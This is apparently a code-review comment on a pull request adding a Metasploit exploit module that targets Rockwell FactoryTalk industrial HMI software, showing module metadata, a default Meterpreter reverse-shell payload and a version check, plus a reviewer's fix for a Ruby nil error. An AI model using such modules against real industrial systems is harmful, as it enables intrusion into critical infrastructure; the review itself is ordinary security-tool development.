modules/exploits/windows/scada/rockwell_factorytalk_rce.rb

```diff
@@ -0,0 +1,224 @@
+          the second is a directory traversal, and the third is a race condition. In order to achieve full remote code execution on all
+          targets, two information leak vulnerabilities are also abused.
+          This exploit was used by the Flashback team (Pedro Ribeiro + Radek Domanski) in Pwn2Own Miami 2020 to win the EWS category.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+        [
+          'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability discovery and Metasploit module
+          'Radek Domanski <radek.domanski[at]gmail.com>' # Vulnerability discovery and Metasploit module
+        ],
+        'References' =>
+          [
+            [ 'URL', 'https://www.thezdi.com/blog/2020/7/22/chaining-5-bugs-for-code-execution-on-the-rockwell-factorytalk-hmi-at-pwn2own-miami'],
+            [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Miami_2020/replicant/replicant.md'],
+            [ 'URL', 'https://github.com/rdomanski/Exploits_and_Advisories/tree/master/advisories/Pwn2Own/Miami2020/replicant.md'],
+            [ 'CVE', '2020-12027'],
+            [ 'CVE', '2020-12028'],
+            [ 'CVE', '2020-12029'],
+            [ 'ZDI', '20-727'],
+            [ 'ZDI', '20-728'],
+            [ 'ZDI', '20-729'],
+            [ 'ZDI', '20-730'],
+          ],
+        'Privileged' => false,
+        'Platform' => 'win',
+        'Arch' => [ARCH_X86, ARCH_X64],
+        'Stance' => Msf::Exploit::Stance::Aggressive,
+        'Payload' => {
+          'DefaultOptions' =>
+            {
+              'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
+            }
+        },
+        'DefaultOptions' => { 'WfsDelay' => 20 },
+        'Targets' =>
+          [
+            [ 'Rockwell Automation FactoryTalk SE', {} ]
+          ],
+        'DisclosureDate' => '2020-06-22',
+        'DefaultTarget' => 0
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('SRVHOST', [true, 'IP address of the host serving the exploit']),
+        OptInt.new('SRVPORT', [true, 'Port of the host serving the exploit on', 8080]),
+        OptString.new('TARGETURI', [true, 'The base path to Rockwell FactoryTalk', '/rsviewse/'])
+      ]
+    )
+
+    register_advanced_options(
+      [
+        OptInt.new('SLEEP_RACER', [true, 'Number of seconds to wait for racer thread to finish', 15]),
+      ]
+    )
+  end
+
+  def send_to_factory(path)
+    send_request_cgi({
+      'uri' => normalize_uri(target_uri, path),
+      'method' => 'GET'
+    })
+  end
+
+  def check
+    res = send_to_factory('/hmi_isapi.dll')
+    return Exploit::CheckCode::Safe unless res && res.code == 200
+
+    # Parse version from response body
+    # Example: Version 11.00.00.230
+    version = res.body.match(/Version ([0-9\.]{5,})/)[1].split('.')
+
+    # Is returned version sound?
+    if version
```

Comment:
This will die with a stack trace if the regex does not match.

```
irb(main):001:0> version = "asdf".match(/Version ([0-9\.]{5,})/)[1].split('.')
Traceback (most recent call last):
        4: from /usr/local/bin/irb:23:in `<main>'
        3: from /usr/local/bin/irb:23:in `load'
        2: from /var/lib/gems/2.7.0/gems/irb-1.2.7/exe/irb:11:in `<top (required)>'
        1: from (irb):1
NoMethodError (undefined method `[]' for nil:NilClass)
irb(main):002:0> 
```

Given that a length check `4` is performed afterwards, you can cast as string.

```
irb(main):001:0> version = "Version 1.2.3.4.5.6.7".match(/Version ([0-9\.]{5,})/)[1].split('.')
=> ["1", "2", "3", "4", "5", "6", "7"]
irb(main):002:0> version = "Version 1.2.3.4.5.6.7".scan(/Version ([0-9\.]{5,})/).flatten.first.to_s.split('.')
=> ["1", "2", "3", "4", "5", "6", "7"]
irb(main):003:0> version = "asdf".scan(/Version ([0-9\.]{5,})/).flatten.first.to_s.split('.')
=> []
irb(main):004:0> 
```

Then bail if the version array is empty.

```suggestion
    version = res.body.scan(/Version ([0-9\.]{5,})/).flatten.first.to_s.split('.')

    # Is returned version sound?
    unless version.empty?
```